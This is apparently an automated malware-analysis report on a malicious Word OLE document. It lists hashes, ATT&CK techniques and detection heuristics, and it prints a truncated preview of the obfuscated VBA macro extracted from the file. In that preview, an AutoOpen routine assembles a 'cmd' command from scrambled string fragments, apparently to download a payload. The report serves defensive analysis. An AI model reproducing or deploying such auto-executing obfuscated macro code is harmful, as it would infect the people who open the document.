Office (OLE) malware analysis — malicious · 99c9014aca44ef3c

MALICIOUS

Office (OLE)

203.6 KB First seen: 2019-03-10

MD5: c4c7978c74ae50a084969c1fbc727226 SHA-1: b00626eb15c321472c29dcf74f7349023ca21428 SHA-256: 99c9014aca44ef3cdf687d98ce4585d8ebe7002e0db4e896872a18e316937d6e

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The critical heuristic firing for Shell() call in VBA indicates that the macro likely attempts to download and execute a second-stage payload. While the specific payload and destination are obfuscated, the presence of the AutoOpen macro and Shell() call strongly suggests a malicious intent, likely delivered as a spearphishing attachment.

Heuristics 6

ClamAV: Doc.Malware.00536d-6696772-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6696772-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 175081 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	175081 bytes
SHA-256: `c3ab1dfd8e9840b59d043e56de7df1d700c3f62faf7b2b460778fd39d977000c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "blAhHXwjoRIjs" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim IjYzFD(1) IjYzFD(0) = Mid(ZuAzqBpZvdi + NjAFnzdilMWLhzKHGWJNlqmvUihk + XuAXtRDVs, 768, 654) + MidB(fUpPoXHjuDS + ADJEEcWInwmNoSDhWNHbiPtMNddq + iQAMnjFn, 385, 853) + MidB(cbipfNhmnCtbi + PJiJwQdiRrtmaoummSiXwQJ + bWYhzYpipi, 692, 521) + Left(KXnUvMzJfhsBs + jtnUIGBtKtNkDjKLnzKvNiVSrrp + DsIpwGqlJida, 650) Dim FzWjOS(1) FzWjOS(0) = Left(WzZmnoJBVvjj + qOFzoKVhVfGjNsIjOlGmUDzzcHiAvX + IaQdHQoc, 886) + Right(aRjMMSvL + rltqLsaqiLIDkNSkiqzPcWhwuSizMAIQpXm + OlPUwXhTit, 648) Dim wVHPm(1) wVHPm(0) = Mid(LIKVdtDj + bPzukXnEFumtKbbZiziKtQozL + mlonhMdSMzTL, 649, 7) + Left(PztoObKnRt + iwYcAWYwFdPLcOmAKdrYA + UKbBWoHXo, 306) + MidB(KLcGaKWidCLhY + tcmXXKlCNizionXzDWiWRNdnlRztcsw + BsBhYIOYdciWpf, 229, 589) + Left(DLFVJuW + OoUqstrVHBoDTzolvRwOaptCpjiGLZXA + lpdzJEcN, 976) Dim wwAOz(1) wwAOz(0) = Right(LzYDhpEAkDfzLJ + mHndGjzvFrkOcRTzMCtWSrCpcjOaIVANHL + fAcwpEqXTiLzz, 124) + Left(uJVlEqULqRc + EQHLYXtttINiWwXQnZSwqBj + QHXczwONEla, 663) + MidB(BAHjZUWnZpaF + SQKojNcmklEikTfBTRwiRJUJdhiBru + nblzaEOPWfrMlU, 902, 771) + Mid(JTUisiP + ECjMoiofDPUYoCMmSIXImmlJbFjGkWEKNmT + worYnhURlVFM, 130, 636) Dim tLbhz(1) tLbhz(0) = Mid(fGQAvFWSzvfV + vIYmAwTSFGUaZpiQOGnvFIPOEEX + iTzDCvwsT, 245, 19) + MidB(UGzdRfROSrW + dkhOOhSCwbmfURNTrZoIQbmsVC + bwjSMLFwSrd, 463, 531) + MidB(lKAAzJzPuobQn + zzkDApvCECOjFvQhukUBMSdhpikuRX + dnYWBpIvwkZsPw, 460, 888) + MidB(aHdzXlW + XUHwMbGRJYiLZYDlRqGqZPzWQjPm + jkbqnMQIjvkzUO, 640, 87) Dim IpaCV(1) IpaCV(0) = Left(TIjCksVaTOb + uVGFQrqjdupNrFwsAOXQDikYQvmzf + XmiVmdWqpN, 127) + Left(AQdaOPqFWF + jTaorwziqUSXOhMYiRNXzSLjPQRAhfv + wBwRIijj, 951) + Right(AidhoCG + waWfNhSZTicHWQWjnhqCCIjhmjMiY + OWfSEaLHMLjas, 225) + Right(ERTUlFYT + AfpHHKpUItrjMbZdqrVZZHMESBJwL + ajRFEVlXDTT, 754) Dim skqQRd(1) skqQRd(0) = Mid(PFqlMWYocpwM + VJJLFcuipLluPDSSwzKSviOY + rHhFMOjGGYGm, 632, 313) + Mid(sbJlJWwDjiLqOc + PvzEEOiWMMaCuovqmPudU + WdDqrdhCXkS, 496, 917) Dim jPwwU(2) jPwwU(0) = MidB(fYwLwCbwsvzhSj + UwwAcQZArpYAtaSiNSIBVFWlzj + bGCbwVc, 382, 295) + Right(cFMCwzVfOrAQtL + vFibRzoNSzRwqHTNXjDalcEULa + PBrhNkYi, 571) jPwwU(1) = Mid(jwisiYjhCWfBVs + wMicndpBaFJtisCiJTbDjctmmjzWpirZRzo + JjRdPqw, 247, 567) + MidB(MYEpOqhAtq + biTLrQbCqNRXRshluGdKQiCLa + SPGOquviHwCaf, 286, 222) BvdFkbn (KeyString(vbKeyC) + KeyString(vbKeyM) + QiOPYSH + sfUzLNkNtU + QCqjSiWo + BzBiuCkM + OwKYAQRQ + mEoVScvZsF) Dim VitAvf(2) VitAvf(0) = MidB(zNtHfjKkd + mnXrcNCSiVknKiacVmpoUZK + lSKwmtLswrQms, 257, 711) + Right(cGzwGhFckZz + RSjMjYTzuzpcldYEEqwEjs + FTCTNtuZzGfj, 245) VitAvf(1) = Left(iLwHdwp + BtvNUOwUnNFvbiMRHzrrnlSsllC + EvSUwhEiJ, 221) + Right(CwjjMLvkYI + BHbCWLiwwBzJRzAHmMSlmjIZZHErwm + qGCMwchZE, 958) + MidB(vOucpKWzjWo + mJrvGFMAwuFWzJhpzidLMbClPLj + jzLTpizsX, 499, 940) + Left(XSKNSqozUfIziU + wpPmdWXnpOjwbIjENaCtsfSOUDWKJ + bkhUWBvXXd, 531) End Sub Attribute VB_Name = "sWctRQU" Function QiOPYSH() Dim cUnoQl(1) cUnoQl(0) = MidB(YZiivNQKQTTh + UVGKrTZUUBwRpJNqTFYQbYOPhmQCYGoz + AIiJEEhmiXGuC, 556, 992) + Left(famildEriEzY + LkVpKWOpCpuqjnCvVIWsNOfdR + iNTVvJhnoFWTlj, 789) + Right(vEzQwcptpsHb + wqpUbaVNdBANqolIYXtiNllicFRZMJMZd + NQQiazQim, 802) + Mid(jjElLjT + qwtHMcoDdZLpLGcznYTDXBhqHYBqJphWU + NVbiIQtOrYz, 175, 222) Dim qCHBja(1) qCHBja(0) = MidB(TwsjzCXNiBZ + buWjUOlXjzJaavdQYCvRzGbOmWdZoR + HlULMhIkB, 675, 180) + MidB(ikScXZcc + YszzAFXVIijhrNpOIOEwzDmLzQrPm + wSMiHidNAqaBsW, 294, 645) Dim nfsHVF(2) nfsHVF(0) = Mid(jfciBAKplEYZ + YpYinpSKPpuOBdMCVhzjhrOjjLEmWrvH + qSqTWQmonwIL, 479, 38) + MidB(TwZIrnYJiwKDY + vaiMCrPiusEQYCjiXziurDujk + jQPsNku, 801, 16) + MidB(YqNwiIk + ITtzGNjmIKiAcoXLnsMifTbr + UlvZNzPXQmzEH, 632, 848) + Mid(YNCWukZYSv + jfVzuoWOFfwFYlLiqquDiiWaAVB + iJjGiEN, 860, 409) nfsHVF(1) = Right(liGQVzOpiP + lcrVXNWtDsRwoijiWQaRwXGFBHM + jlwiniqfzjQsF, 7 ... (truncated)

SHA-256: c3ab1dfd8e9840b59d043e56de7df1d700c3f62faf7b2b460778fd39d977000c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "blAhHXwjoRIjs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim IjYzFD(1)
IjYzFD(0) = Mid(ZuAzqBpZvdi + NjAFnzdilMWLhzKHGWJNlqmvUihk + XuAXtRDVs, 768, 654) + MidB(fUpPoXHjuDS + ADJEEcWInwmNoSDhWNHbiPtMNddq + iQAMnjFn, 385, 853) + MidB(cbipfNhmnCtbi + PJiJwQdiRrtmaoummSiXwQJ + bWYhzYpipi, 692, 521) + Left(KXnUvMzJfhsBs + jtnUIGBtKtNkDjKLnzKvNiVSrrp + DsIpwGqlJida, 650)
   Dim FzWjOS(1)
FzWjOS(0) = Left(WzZmnoJBVvjj + qOFzoKVhVfGjNsIjOlGmUDzzcHiAvX + IaQdHQoc, 886) + Right(aRjMMSvL + rltqLsaqiLIDkNSkiqzPcWhwuSizMAIQpXm + OlPUwXhTit, 648)
   Dim wVHPm(1)
wVHPm(0) = Mid(LIKVdtDj + bPzukXnEFumtKbbZiziKtQozL + mlonhMdSMzTL, 649, 7) + Left(PztoObKnRt + iwYcAWYwFdPLcOmAKdrYA + UKbBWoHXo, 306) + MidB(KLcGaKWidCLhY + tcmXXKlCNizionXzDWiWRNdnlRztcsw + BsBhYIOYdciWpf, 229, 589) + Left(DLFVJuW + OoUqstrVHBoDTzolvRwOaptCpjiGLZXA + lpdzJEcN, 976)
   Dim wwAOz(1)
wwAOz(0) = Right(LzYDhpEAkDfzLJ + mHndGjzvFrkOcRTzMCtWSrCpcjOaIVANHL + fAcwpEqXTiLzz, 124) + Left(uJVlEqULqRc + EQHLYXtttINiWwXQnZSwqBj + QHXczwONEla, 663) + MidB(BAHjZUWnZpaF + SQKojNcmklEikTfBTRwiRJUJdhiBru + nblzaEOPWfrMlU, 902, 771) + Mid(JTUisiP + ECjMoiofDPUYoCMmSIXImmlJbFjGkWEKNmT + worYnhURlVFM, 130, 636)
   Dim tLbhz(1)
tLbhz(0) = Mid(fGQAvFWSzvfV + vIYmAwTSFGUaZpiQOGnvFIPOEEX + iTzDCvwsT, 245, 19) + MidB(UGzdRfROSrW + dkhOOhSCwbmfURNTrZoIQbmsVC + bwjSMLFwSrd, 463, 531) + MidB(lKAAzJzPuobQn + zzkDApvCECOjFvQhukUBMSdhpikuRX + dnYWBpIvwkZsPw, 460, 888) + MidB(aHdzXlW + XUHwMbGRJYiLZYDlRqGqZPzWQjPm + jkbqnMQIjvkzUO, 640, 87)
   Dim IpaCV(1)
IpaCV(0) = Left(TIjCksVaTOb + uVGFQrqjdupNrFwsAOXQDikYQvmzf + XmiVmdWqpN, 127) + Left(AQdaOPqFWF + jTaorwziqUSXOhMYiRNXzSLjPQRAhfv + wBwRIijj, 951) + Right(AidhoCG + waWfNhSZTicHWQWjnhqCCIjhmjMiY + OWfSEaLHMLjas, 225) + Right(ERTUlFYT + AfpHHKpUItrjMbZdqrVZZHMESBJwL + ajRFEVlXDTT, 754)
   Dim skqQRd(1)
skqQRd(0) = Mid(PFqlMWYocpwM + VJJLFcuipLluPDSSwzKSviOY + rHhFMOjGGYGm, 632, 313) + Mid(sbJlJWwDjiLqOc + PvzEEOiWMMaCuovqmPudU + WdDqrdhCXkS, 496, 917)
   Dim jPwwU(2)
jPwwU(0) = MidB(fYwLwCbwsvzhSj + UwwAcQZArpYAtaSiNSIBVFWlzj + bGCbwVc, 382, 295) + Right(cFMCwzVfOrAQtL + vFibRzoNSzRwqHTNXjDalcEULa + PBrhNkYi, 571)
jPwwU(1) = Mid(jwisiYjhCWfBVs + wMicndpBaFJtisCiJTbDjctmmjzWpirZRzo + JjRdPqw, 247, 567) + MidB(MYEpOqhAtq + biTLrQbCqNRXRshluGdKQiCLa + SPGOquviHwCaf, 286, 222)
BvdFkbn (KeyString(vbKeyC) + KeyString(vbKeyM) + QiOPYSH + sfUzLNkNtU + QCqjSiWo + BzBiuCkM + OwKYAQRQ + mEoVScvZsF)
   Dim VitAvf(2)
VitAvf(0) = MidB(zNtHfjKkd + mnXrcNCSiVknKiacVmpoUZK + lSKwmtLswrQms, 257, 711) + Right(cGzwGhFckZz + RSjMjYTzuzpcldYEEqwEjs + FTCTNtuZzGfj, 245)
VitAvf(1) = Left(iLwHdwp + BtvNUOwUnNFvbiMRHzrrnlSsllC + EvSUwhEiJ, 221) + Right(CwjjMLvkYI + BHbCWLiwwBzJRzAHmMSlmjIZZHErwm + qGCMwchZE, 958) + MidB(vOucpKWzjWo + mJrvGFMAwuFWzJhpzidLMbClPLj + jzLTpizsX, 499, 940) + Left(XSKNSqozUfIziU + wpPmdWXnpOjwbIjENaCtsfSOUDWKJ + bkhUWBvXXd, 531)
End Sub


Attribute VB_Name = "sWctRQU"
Function QiOPYSH()
Dim cUnoQl(1)
cUnoQl(0) = MidB(YZiivNQKQTTh + UVGKrTZUUBwRpJNqTFYQbYOPhmQCYGoz + AIiJEEhmiXGuC, 556, 992) + Left(famildEriEzY + LkVpKWOpCpuqjnCvVIWsNOfdR + iNTVvJhnoFWTlj, 789) + Right(vEzQwcptpsHb + wqpUbaVNdBANqolIYXtiNllicFRZMJMZd + NQQiazQim, 802) + Mid(jjElLjT + qwtHMcoDdZLpLGcznYTDXBhqHYBqJphWU + NVbiIQtOrYz, 175, 222)
   Dim qCHBja(1)
qCHBja(0) = MidB(TwsjzCXNiBZ + buWjUOlXjzJaavdQYCvRzGbOmWdZoR + HlULMhIkB, 675, 180) + MidB(ikScXZcc + YszzAFXVIijhrNpOIOEwzDmLzQrPm + wSMiHidNAqaBsW, 294, 645)
   Dim nfsHVF(2)
nfsHVF(0) = Mid(jfciBAKplEYZ + YpYinpSKPpuOBdMCVhzjhrOjjLEmWrvH + qSqTWQmonwIL, 479, 38) + MidB(TwZIrnYJiwKDY + vaiMCrPiusEQYCjiXziurDujk + jQPsNku, 801, 16) + MidB(YqNwiIk + ITtzGNjmIKiAcoXLnsMifTbr + UlvZNzPXQmzEH, 632, 848) + Mid(YNCWukZYSv + jfVzuoWOFfwFYlLiqquDiiWaAVB + iJjGiEN, 860, 409)
nfsHVF(1) = Right(liGQVzOpiP + lcrVXNWtDsRwoijiWQaRwXGFBHM + jlwiniqfzjQsF, 7
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.